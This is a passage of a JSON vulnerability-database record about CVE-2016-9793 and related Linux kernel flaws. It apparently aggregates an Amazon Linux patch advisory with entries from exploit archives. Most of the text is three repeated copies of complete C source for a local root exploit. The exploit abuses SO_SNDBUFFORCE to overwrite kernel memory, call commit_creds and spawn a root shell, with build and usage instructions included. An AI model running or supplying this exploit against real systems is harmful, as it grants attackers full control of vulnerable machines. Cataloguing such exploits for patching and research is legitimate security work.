{"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "", "status": "cve,details"}], "amazon": [{"lastseen": "2018-10-02T16:55:21", "references": [], "affectedPackage": [{"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "i686", "packageFilename": "kernel-tools-debuginfo-4.4.39-34.54.amzn1.i686.rpm", "packageName": "kernel-tools-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "src", "packageFilename": "kernel-4.4.39-34.54.amzn1.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "x86_64", "packageFilename": "kernel-debuginfo-common-x86_64-4.4.39-34.54.amzn1.x86_64.rpm", "packageName": "kernel-debuginfo-common-x86_64", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "i686", "packageFilename": "kernel-tools-devel-4.4.39-34.54.amzn1.i686.rpm", "packageName": "kernel-tools-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "x86_64", "packageFilename": "kernel-headers-4.4.39-34.54.amzn1.x86_64.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "x86_64", "packageFilename": "kernel-devel-4.4.39-34.54.amzn1.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "i686", "packageFilename": "perf-debuginfo-4.4.39-34.54.amzn1.i686.rpm", "packageName": "perf-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "x86_64", "packageFilename": "kernel-debuginfo-4.4.39-34.54.amzn1.x86_64.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "x86_64", "packageFilename": "perf-4.4.39-34.54.amzn1.x86_64.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "i686", "packageFilename": "kernel-debuginfo-4.4.39-34.54.amzn1.i686.rpm", "packageName": "kernel-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "i686", "packageFilename": "kernel-4.4.39-34.54.amzn1.i686.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "i686", "packageFilename": "kernel-headers-4.4.39-34.54.amzn1.i686.rpm", "packageName": "kernel-headers", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "x86_64", "packageFilename": "kernel-tools-4.4.39-34.54.amzn1.x86_64.rpm", "packageName": "kernel-tools", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "x86_64", "packageFilename": "perf-debuginfo-4.4.39-34.54.amzn1.x86_64.rpm", "packageName": "perf-debuginfo", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "x86_64", "packageFilename": "kernel-4.4.39-34.54.amzn1.x86_64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "noarch", "packageFilename": "kernel-doc-4.4.39-34.54.amzn1.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "x86_64", "packageFilename": "kernel-tools-devel-4.4.39-34.54.amzn1.x86_64.rpm", "packageName": "kernel-tools-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "i686", "packageFilename": "kernel-tools-4.4.39-34.54.amzn1.i686.rpm", "packageName": "kernel-tools", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "i686", "packageFilename": "kernel-debuginfo-common-i686-4.4.39-34.54.amzn1.i686.rpm", "packageName": "kernel-debuginfo-common-i686", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "i686", "packageFilename": "perf-4.4.39-34.54.amzn1.i686.rpm", "packageName": "perf", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "i686", "packageFilename": "kernel-devel-4.4.39-34.54.amzn1.i686.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Amazon Linux", "OSVersion": "any", "packageVersion": "4.4.39-34.54.amzn1", "arch": "x86_64", "packageFilename": "kernel-tools-debuginfo-4.4.39-34.54.amzn1.x86_64.rpm", "packageName": "kernel-tools-debuginfo", "operator": "lt"}], "description": "**Issue Overview:**\n\nA flaw was found in the Linux kernel key management subsystem in which a local attacker could crash the kernel or corrupt the stack and additional memory (denial of service) by supplying a specially crafted RSA key. This flaw panics the machine during the verification of the RSA key. ([CVE-2016-8650 __](<https://access.redhat.com/security/cve/CVE-2016-8650>))\n\nThe blk_rq_map_user_iov function in block/blk-map.c in the Linux kernel before 4.8.14 does not properly restrict the type of iterator, which allows local users to read or write to arbitrary kernel memory locations or cause a denial of service (use-after-free) by leveraging access to a /dev/sg device. ([CVE-2016-9576 __](<https://access.redhat.com/security/cve/CVE-2016-9576>))\n\nThe sock_setsockopt function in net/core/sock.c in the Linux kernel before 4.8.14 mishandles negative values of sk_sndbuf and sk_rcvbuf, which allows local users to cause a denial of service (memory corruption and system crash) or possibly have unspecified other impact by leveraging the CAP_NET_ADMIN capability for a crafted setsockopt system call with the (1) SO_SNDBUFFORCE or (2) SO_RCVBUFFORCE option. ([CVE-2016-9793 __](<https://access.redhat.com/security/cve/CVE-2016-9793>))\n\nA flaw was found in the Linux networking subsystem where a local attacker with CAP_NET_ADMIN capabilities could cause an out of bounds read by creating a smaller-than-expected ICMP header and sending to its destination via sendto(). ([CVE-2016-8399 __](<https://access.redhat.com/security/cve/CVE-2016-8399>))\n\nAlgorithms not compatible with mcryptd could be spawned by mcryptd with a direct crypto_alloc_tfm invocation using a \"mcryptd(alg)\" name construct. This causes mcryptd to crash the kernel if an arbitrary \"alg\" is incompatible and not intended to be used with mcryptd. ([CVE-2016-10147 __](<https://access.redhat.com/security/cve/CVE-2016-10147>))\n\n(Updated on 2017-01-19: [CVE-2016-8399 __](<https://access.redhat.com/security/cve/CVE-2016-8399>) was fixed in this release but was previously not part of this errata.) \n(Updated on 2017-02-22: [CVE-2016-10147 __](<https://access.redhat.com/security/cve/CVE-2016-10147>) was fixed in this release but was previously not part of this errata.)\n\n \n**Affected Packages:** \n\n\nkernel\n\n \n**Issue Correction:** \nRun _yum update kernel_ to update your system. You will need to reboot your system in order for the new kernel to be running.\n\n \n\n\n**New Packages:**\n \n \n i686: \n kernel-debuginfo-4.4.39-34.54.amzn1.i686 \n kernel-headers-4.4.39-34.54.amzn1.i686 \n kernel-tools-debuginfo-4.4.39-34.54.amzn1.i686 \n kernel-tools-4.4.39-34.54.amzn1.i686 \n kernel-debuginfo-common-i686-4.4.39-34.54.amzn1.i686 \n kernel-4.4.39-34.54.amzn1.i686 \n kernel-devel-4.4.39-34.54.amzn1.i686 \n kernel-tools-devel-4.4.39-34.54.amzn1.i686 \n perf-debuginfo-4.4.39-34.54.amzn1.i686 \n perf-4.4.39-34.54.amzn1.i686 \n \n noarch: \n kernel-doc-4.4.39-34.54.amzn1.noarch \n \n src: \n kernel-4.4.39-34.54.amzn1.src \n \n x86_64: \n perf-4.4.39-34.54.amzn1.x86_64 \n kernel-tools-debuginfo-4.4.39-34.54.amzn1.x86_64 \n kernel-4.4.39-34.54.amzn1.x86_64 \n kernel-devel-4.4.39-34.54.amzn1.x86_64 \n kernel-headers-4.4.39-34.54.amzn1.x86_64 \n kernel-tools-4.4.39-34.54.amzn1.x86_64 \n kernel-debuginfo-common-x86_64-4.4.39-34.54.amzn1.x86_64 \n kernel-tools-devel-4.4.39-34.54.amzn1.x86_64 \n perf-debuginfo-4.4.39-34.54.amzn1.x86_64 \n kernel-debuginfo-4.4.39-34.54.amzn1.x86_64 \n \n \n", "edition": 1, "reporter": "Amazon", "published": "2017-02-22T12:00:00", "title": "Medium: kernel", "type": "amazon", "enchantments": {"score": {"modified": "2018-10-02T16:55:21", "vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2016-8650", "CVE-2016-8399", "CVE-2016-9793", "CVE-2016-10147", "CVE-2016-9576"], "modified": "2017-02-22T12:00:00", "id": "ALAS-2017-782", "href": "https://alas.aws.amazon.com/ALAS-2017-782.html", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2017-05-12T08:48:20", "osvdbidlist": [], "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"], "references": [], "description": "Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation. CVE-2016-9793. Local exploit for Linux platform", "reporter": "Exploit-DB", "published": "2017-02-22T00:00:00", "type": "exploitdb", "title": "Linux Kernel 3.11 < 4.8 0 - 'SO_SNDBUFFORCE' & 'SO_RCVBUFFORCE' Local Privilege Escalation", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2016-9793"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "modified": "2017-02-22T00:00:00", "id": "EDB-ID:41995", "href": "https://www.exploit-db.com/exploits/41995/", "sourceData": "// CAP_NET_ADMIN -> root LPE exploit for CVE-2016-9793\r\n// No KASLR, SMEP or SMAP bypass included\r\n// Affected kernels: 3.11 -> 4.8\r\n// Tested in QEMU only\r\n// https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793\r\n//\r\n// Usage:\r\n// # gcc -pthread exploit.c -o exploit\r\n// # chown guest:guest exploit\r\n// # setcap cap_net_admin+ep ./exploit\r\n// # su guest\r\n// $ whoami\r\n// guest\r\n// $ ./exploit\r\n// [.] userspace payload mmapped at 0xfffff000\r\n// [.] overwriting thread started\r\n// [.] sockets opened\r\n// [.] sock->sk_sndbuf set to fffffe00\r\n// [.] writing to socket\r\n// [+] got r00t\r\n// # whoami\r\n// root\r\n//\r\n// Andrey Konovalov <andreyknvl@gmail.com>\r\n\r\n#define _GNU_SOURCE\r\n\r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n#include <sys/time.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/mman.h>\r\n\r\n#include <pthread.h>\r\n#include <signal.h>\r\n#include <stdarg.h>\r\n#include <stddef.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n\r\n#define COMMIT_CREDS 0xffffffff81079860ul\r\n#define PREPARE_KERNEL_CRED 0xffffffff81079b20ul\r\n\r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n\r\n_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;\r\n_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;\r\n\r\nvoid get_root(void) {\r\n \tcommit_creds(prepare_kernel_cred(0));\r\n}\r\n\r\nstruct ubuf_info_t {\r\n uint64_t callback; // void (*callback)(struct ubuf_info *, bool)\r\n uint64_t ctx; // void *\r\n uint64_t desc; // unsigned long\r\n};\r\n\r\nstruct skb_shared_info_t {\r\n uint8_t nr_frags; // unsigned char\r\n uint8_t tx_flags; // __u8\r\n uint16_t gso_size; // unsigned short\r\n uint16_t gso_segs; // unsigned short\r\n uint16_t gso_type; // unsigned short\r\n uint64_t frag_list; // struct sk_buff *\r\n uint64_t hwtstamps; // struct skb_shared_hwtstamps\r\n uint32_t tskey; // u32\r\n uint32_t ip6_frag_id; // __be32\r\n uint32_t dataref; // atomic_t\r\n uint64_t destructor_arg; // void *\r\n uint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS];\r\n};\r\n\r\n// sk_sndbuf = 0xffffff00 => skb_shinfo(skb) = 0x00000000fffffed0\r\n#define SNDBUF 0xffffff00\r\n#define SHINFO 0x00000000fffffed0ul\r\n\r\nstruct ubuf_info_t ubuf_info = {(uint64_t)&get_root, 0, 0};\r\n//struct ubuf_info_t ubuf_info = {0xffffdeaddeadbeeful, 0, 0};\r\nstruct skb_shared_info_t *skb_shared_info = (struct skb_shared_info_t *)SHINFO;\r\n\r\n#define SKBTX_DEV_ZEROCOPY (1 << 3)\r\n\r\nvoid* skb_thr(void* arg) {\r\n\twhile (1) {\r\n\t\tskb_shared_info->destructor_arg = (uint64_t)&ubuf_info;\r\n\t\tskb_shared_info->tx_flags |= SKBTX_DEV_ZEROCOPY;\r\n\t}\r\n}\r\n\r\nint sockets[2];\r\n\r\nvoid *write_thr(void *arg) {\r\n\t// Write blocks until setsockopt(SO_SNDBUF).\r\n\twrite(sockets[1], \"\\x5c\", 1);\r\n\r\n\tif (getuid() == 0) {\r\n\t\tprintf(\"[+] got r00t\\n\");\r\n\t\texecl(\"/bin/bash\", \"bash\", NULL);\r\n\t\tperror(\"execl()\");\r\n\t}\r\n\tprintf(\"[-] something went wrong\\n\");\r\n}\r\n\r\nint main() {\r\n\tvoid *addr;\r\n\tint rv;\r\n\tuint32_t sndbuf;\r\n\r\n\taddr = mmap((void *)(SHINFO & 0xfffffffffffff000ul), 0x1000ul,\r\n\t\tPROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE,\r\n\t\t-1, 0);\r\n\tif (addr != (void *)(SHINFO & 0xfffffffffffff000ul)) {\r\n\t\tperror(\"mmap()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tprintf(\"[.] userspace payload mmapped at %p\\n\", addr);\r\n\r\n \tpthread_t skb_th;\r\n \trv = pthread_create(&skb_th, 0, skb_thr, NULL);\r\n\tif (rv != 0) {\r\n\t\tperror(\"pthread_create()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n \tusleep(10000);\r\n\r\n\tprintf(\"[.] overwriting thread started\\n\");\r\n\r\n\trv = socketpair(AF_LOCAL, SOCK_STREAM, 0, &sockets[0]);\r\n\tif (rv != 0) {\r\n\t\tperror(\"socketpair()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tprintf(\"[.] sockets opened\\n\");\r\n\r\n\tsndbuf = SNDBUF;\r\n\trv = setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUFFORCE,\r\n\t\t\t&sndbuf, sizeof(sndbuf));\r\n\tif (rv != 0) {\r\n\t\tperror(\"setsockopt()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\r\n\tprintf(\"[.] sock->sk_sndbuf set to %x\\n\", SNDBUF * 2);\r\n\r\n\tpthread_t write_th;\r\n\trv = pthread_create(&write_th, 0, write_thr, NULL);\r\n\tif (rv != 0) {\r\n\t\tperror(\"pthread_create()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tusleep(10000);\r\n\r\n\tprintf(\"[.] writing to socket\\n\");\r\n\r\n\t// Wake up blocked write.\r\n\trv = setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUF,\r\n\t\t\t&sndbuf, sizeof(sndbuf));\r\n\tif (rv != 0) {\r\n\t\tperror(\"setsockopt()\");\r\n\t\texit(EXIT_FAILURE);\r\n\t}\r\n\tusleep(10000);\r\n\r\n\tclose(sockets[0]);\r\n\tclose(sockets[1]);\r\n\r\n\treturn 0;\r\n}", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/41995/"}], "packetstorm": [{"lastseen": "2017-05-13T17:26:58", "references": [], "description": "", "edition": 1, "reporter": "Andrey Konovalov", "published": "2017-05-12T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "title": "Linux Kernel SO_SNDBUFFORCE / SO_RCVBUFFORCE Local Privilege Escalation", "type": "packetstorm", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-9793"], "modified": "2017-05-12T00:00:00", "href": "https://packetstormsecurity.com/files/142487/Linux-Kernel-SO_SNDBUFFORCE-SO_RCVBUFFORCE-Local-Privilege-Escalation.html", "id": "PACKETSTORM:142487", "sourceData": "`// CAP_NET_ADMIN -> root LPE exploit for CVE-2016-9793 \n// No KASLR, SMEP or SMAP bypass included \n// Affected kernels: 3.11 -> 4.8 \n// Tested in QEMU only \n// https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793 \n// \n// Usage: \n// # gcc -pthread exploit.c -o exploit \n// # chown guest:guest exploit \n// # setcap cap_net_admin+ep ./exploit \n// # su guest \n// $ whoami \n// guest \n// $ ./exploit \n// [.] userspace payload mmapped at 0xfffff000 \n// [.] overwriting thread started \n// [.] sockets opened \n// [.] sock->sk_sndbuf set to fffffe00 \n// [.] writing to socket \n// [+] got r00t \n// # whoami \n// root \n// \n// Andrey Konovalov <andreyknvl@gmail.com> \n \n#define _GNU_SOURCE \n \n#include <sys/socket.h> \n#include <sys/stat.h> \n#include <sys/time.h> \n#include <sys/types.h> \n#include <sys/wait.h> \n#include <sys/mman.h> \n \n#include <pthread.h> \n#include <signal.h> \n#include <stdarg.h> \n#include <stddef.h> \n#include <stdint.h> \n#include <stdio.h> \n#include <stdlib.h> \n#include <string.h> \n#include <unistd.h> \n \n#define COMMIT_CREDS 0xffffffff81079860ul \n#define PREPARE_KERNEL_CRED 0xffffffff81079b20ul \n \ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred); \ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred); \n \n_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS; \n_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED; \n \nvoid get_root(void) { \ncommit_creds(prepare_kernel_cred(0)); \n} \n \nstruct ubuf_info_t { \nuint64_t callback; // void (*callback)(struct ubuf_info *, bool) \nuint64_t ctx; // void * \nuint64_t desc; // unsigned long \n}; \n \nstruct skb_shared_info_t { \nuint8_t nr_frags; // unsigned char \nuint8_t tx_flags; // __u8 \nuint16_t gso_size; // unsigned short \nuint16_t gso_segs; // unsigned short \nuint16_t gso_type; // unsigned short \nuint64_t frag_list; // struct sk_buff * \nuint64_t hwtstamps; // struct skb_shared_hwtstamps \nuint32_t tskey; // u32 \nuint32_t ip6_frag_id; // __be32 \nuint32_t dataref; // atomic_t \nuint64_t destructor_arg; // void * \nuint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS]; \n}; \n \n// sk_sndbuf = 0xffffff00 => skb_shinfo(skb) = 0x00000000fffffed0 \n#define SNDBUF 0xffffff00 \n#define SHINFO 0x00000000fffffed0ul \n \nstruct ubuf_info_t ubuf_info = {(uint64_t)&get_root, 0, 0}; \n//struct ubuf_info_t ubuf_info = {0xffffdeaddeadbeeful, 0, 0}; \nstruct skb_shared_info_t *skb_shared_info = (struct skb_shared_info_t *)SHINFO; \n \n#define SKBTX_DEV_ZEROCOPY (1 << 3) \n \nvoid* skb_thr(void* arg) { \nwhile (1) { \nskb_shared_info->destructor_arg = (uint64_t)&ubuf_info; \nskb_shared_info->tx_flags |= SKBTX_DEV_ZEROCOPY; \n} \n} \n \nint sockets[2]; \n \nvoid *write_thr(void *arg) { \n// Write blocks until setsockopt(SO_SNDBUF). \nwrite(sockets[1], \"\\x5c\", 1); \n \nif (getuid() == 0) { \nprintf(\"[+] got r00t\\n\"); \nexecl(\"/bin/bash\", \"bash\", NULL); \nperror(\"execl()\"); \n} \nprintf(\"[-] something went wrong\\n\"); \n} \n \nint main() { \nvoid *addr; \nint rv; \nuint32_t sndbuf; \n \naddr = mmap((void *)(SHINFO & 0xfffffffffffff000ul), 0x1000ul, \nPROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, \n-1, 0); \nif (addr != (void *)(SHINFO & 0xfffffffffffff000ul)) { \nperror(\"mmap()\"); \nexit(EXIT_FAILURE); \n} \n \nprintf(\"[.] userspace payload mmapped at %p\\n\", addr); \n \npthread_t skb_th; \nrv = pthread_create(&skb_th, 0, skb_thr, NULL); \nif (rv != 0) { \nperror(\"pthread_create()\"); \nexit(EXIT_FAILURE); \n} \nusleep(10000); \n \nprintf(\"[.] overwriting thread started\\n\"); \n \nrv = socketpair(AF_LOCAL, SOCK_STREAM, 0, &sockets[0]); \nif (rv != 0) { \nperror(\"socketpair()\"); \nexit(EXIT_FAILURE); \n} \n \nprintf(\"[.] sockets opened\\n\"); \n \nsndbuf = SNDBUF; \nrv = setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUFFORCE, \n&sndbuf, sizeof(sndbuf)); \nif (rv != 0) { \nperror(\"setsockopt()\"); \nexit(EXIT_FAILURE); \n} \n \nprintf(\"[.] sock->sk_sndbuf set to %x\\n\", SNDBUF * 2); \n \npthread_t write_th; \nrv = pthread_create(&write_th, 0, write_thr, NULL); \nif (rv != 0) { \nperror(\"pthread_create()\"); \nexit(EXIT_FAILURE); \n} \nusleep(10000); \n \nprintf(\"[.] writing to socket\\n\"); \n \n// Wake up blocked write. \nrv = setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUF, \n&sndbuf, sizeof(sndbuf)); \nif (rv != 0) { \nperror(\"setsockopt()\"); \nexit(EXIT_FAILURE); \n} \nusleep(10000); \n \nclose(sockets[0]); \nclose(sockets[1]); \n \nreturn 0; \n} \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/142487/lk311sndbufforce-escalate.txt", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdt": [{"lastseen": "2018-01-10T19:13:11", "references": [], "description": "Exploit for linux platform in category local exploits", "edition": 1, "reporter": "Andrey Konovalov", "published": "2017-05-12T00:00:00", "title": "Linux Kernel 3.11 < 4.8 0 - SO_SNDBUFFORCE & SO_RCVBUFFORCE Local Privilege Escalation Exploi", "type": "zdt", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2016-9793"], "modified": "2017-05-12T00:00:00", "href": "https://0day.today/exploit/description/27764", "id": "1337DAY-ID-27764", "sourceData": "// CAP_NET_ADMIN -> root LPE exploit for CVE-2016-9793\r\n// No KASLR, SMEP or SMAP bypass included\r\n// Affected kernels: 3.11 -> 4.8\r\n// Tested in QEMU only\r\n// https://github.com/xairy/kernel-exploits/tree/master/CVE-2016-9793\r\n//\r\n// Usage:\r\n// # gcc -pthread exploit.c -o exploit\r\n// # chown guest:guest exploit\r\n// # setcap cap_net_admin+ep ./exploit\r\n// # su guest\r\n// $ whoami\r\n// guest\r\n// $ ./exploit\r\n// [.] userspace payload mmapped at 0xfffff000\r\n// [.] overwriting thread started\r\n// [.] sockets opened\r\n// [.] sock->sk_sndbuf set to fffffe00\r\n// [.] writing to socket\r\n// [+] got r00t\r\n// # whoami\r\n// root\r\n//\r\n// Andrey Konovalov <[email\u00a0protected]>\r\n \r\n#define _GNU_SOURCE\r\n \r\n#include <sys/socket.h>\r\n#include <sys/stat.h>\r\n#include <sys/time.h>\r\n#include <sys/types.h>\r\n#include <sys/wait.h>\r\n#include <sys/mman.h>\r\n \r\n#include <pthread.h>\r\n#include <signal.h>\r\n#include <stdarg.h>\r\n#include <stddef.h>\r\n#include <stdint.h>\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <string.h>\r\n#include <unistd.h>\r\n \r\n#define COMMIT_CREDS 0xffffffff81079860ul\r\n#define PREPARE_KERNEL_CRED 0xffffffff81079b20ul\r\n \r\ntypedef int __attribute__((regparm(3))) (* _commit_creds)(unsigned long cred);\r\ntypedef unsigned long __attribute__((regparm(3))) (* _prepare_kernel_cred)(unsigned long cred);\r\n \r\n_commit_creds commit_creds = (_commit_creds)COMMIT_CREDS;\r\n_prepare_kernel_cred prepare_kernel_cred = (_prepare_kernel_cred)PREPARE_KERNEL_CRED;\r\n \r\nvoid get_root(void) {\r\n commit_creds(prepare_kernel_cred(0));\r\n}\r\n \r\nstruct ubuf_info_t {\r\n uint64_t callback; // void (*callback)(struct ubuf_info *, bool)\r\n uint64_t ctx; // void *\r\n uint64_t desc; // unsigned long\r\n};\r\n \r\nstruct skb_shared_info_t {\r\n uint8_t nr_frags; // unsigned char\r\n uint8_t tx_flags; // __u8\r\n uint16_t gso_size; // unsigned short\r\n uint16_t gso_segs; // unsigned short\r\n uint16_t gso_type; // unsigned short\r\n uint64_t frag_list; // struct sk_buff *\r\n uint64_t hwtstamps; // struct skb_shared_hwtstamps\r\n uint32_t tskey; // u32\r\n uint32_t ip6_frag_id; // __be32\r\n uint32_t dataref; // atomic_t\r\n uint64_t destructor_arg; // void *\r\n uint8_t frags[16][17]; // skb_frag_t frags[MAX_SKB_FRAGS];\r\n};\r\n \r\n// sk_sndbuf = 0xffffff00 => skb_shinfo(skb) = 0x00000000fffffed0\r\n#define SNDBUF 0xffffff00\r\n#define SHINFO 0x00000000fffffed0ul\r\n \r\nstruct ubuf_info_t ubuf_info = {(uint64_t)&get_root, 0, 0};\r\n//struct ubuf_info_t ubuf_info = {0xffffdeaddeadbeeful, 0, 0};\r\nstruct skb_shared_info_t *skb_shared_info = (struct skb_shared_info_t *)SHINFO;\r\n \r\n#define SKBTX_DEV_ZEROCOPY (1 << 3)\r\n \r\nvoid* skb_thr(void* arg) {\r\n while (1) {\r\n skb_shared_info->destructor_arg = (uint64_t)&ubuf_info;\r\n skb_shared_info->tx_flags |= SKBTX_DEV_ZEROCOPY;\r\n }\r\n}\r\n \r\nint sockets[2];\r\n \r\nvoid *write_thr(void *arg) {\r\n // Write blocks until setsockopt(SO_SNDBUF).\r\n write(sockets[1], \"\\x5c\", 1);\r\n \r\n if (getuid() == 0) {\r\n printf(\"[+] got r00t\\n\");\r\n execl(\"/bin/bash\", \"bash\", NULL);\r\n perror(\"execl()\");\r\n }\r\n printf(\"[-] something went wrong\\n\");\r\n}\r\n \r\nint main() {\r\n void *addr;\r\n int rv;\r\n uint32_t sndbuf;\r\n \r\n addr = mmap((void *)(SHINFO & 0xfffffffffffff000ul), 0x1000ul,\r\n PROT_READ | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE,\r\n -1, 0);\r\n if (addr != (void *)(SHINFO & 0xfffffffffffff000ul)) {\r\n perror(\"mmap()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n printf(\"[.] userspace payload mmapped at %p\\n\", addr);\r\n \r\n pthread_t skb_th;\r\n rv = pthread_create(&skb_th, 0, skb_thr, NULL);\r\n if (rv != 0) {\r\n perror(\"pthread_create()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n usleep(10000);\r\n \r\n printf(\"[.] overwriting thread started\\n\");\r\n \r\n rv = socketpair(AF_LOCAL, SOCK_STREAM, 0, &sockets[0]);\r\n if (rv != 0) {\r\n perror(\"socketpair()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n printf(\"[.] sockets opened\\n\");\r\n \r\n sndbuf = SNDBUF;\r\n rv = setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUFFORCE,\r\n &sndbuf, sizeof(sndbuf));\r\n if (rv != 0) {\r\n perror(\"setsockopt()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n \r\n printf(\"[.] sock->sk_sndbuf set to %x\\n\", SNDBUF * 2);\r\n \r\n pthread_t write_th;\r\n rv = pthread_create(&write_th, 0, write_thr, NULL);\r\n if (rv != 0) {\r\n perror(\"pthread_create()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n usleep(10000);\r\n \r\n printf(\"[.] writing to socket\\n\");\r\n \r\n // Wake up blocked write.\r\n rv = setsockopt(sockets[1], SOL_SOCKET, SO_SNDBUF,\r\n &sndbuf, sizeof(sndbuf));\r\n if (rv != 0) {\r\n perror(\"setsockopt()\");\r\n exit(EXIT_FAILURE);\r\n }\r\n usleep(10000);\r\n \r\n close(sockets[0]);\r\n close(sockets[1]);\r\n \r\n return 0;\r\n}\n\n# 0day.today [2018-01-10] #", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/27764"}], "ubuntu": [{"lastseen": "2018-08-31T00:08:16", "references": ["https://usn.ubuntu.com/usn/usn-3220-1", "https://people.canonical.com/~ubuntu-security/cve/CVE-2017-2636"], "affectedPackage": [{"OS": "Ubuntu", 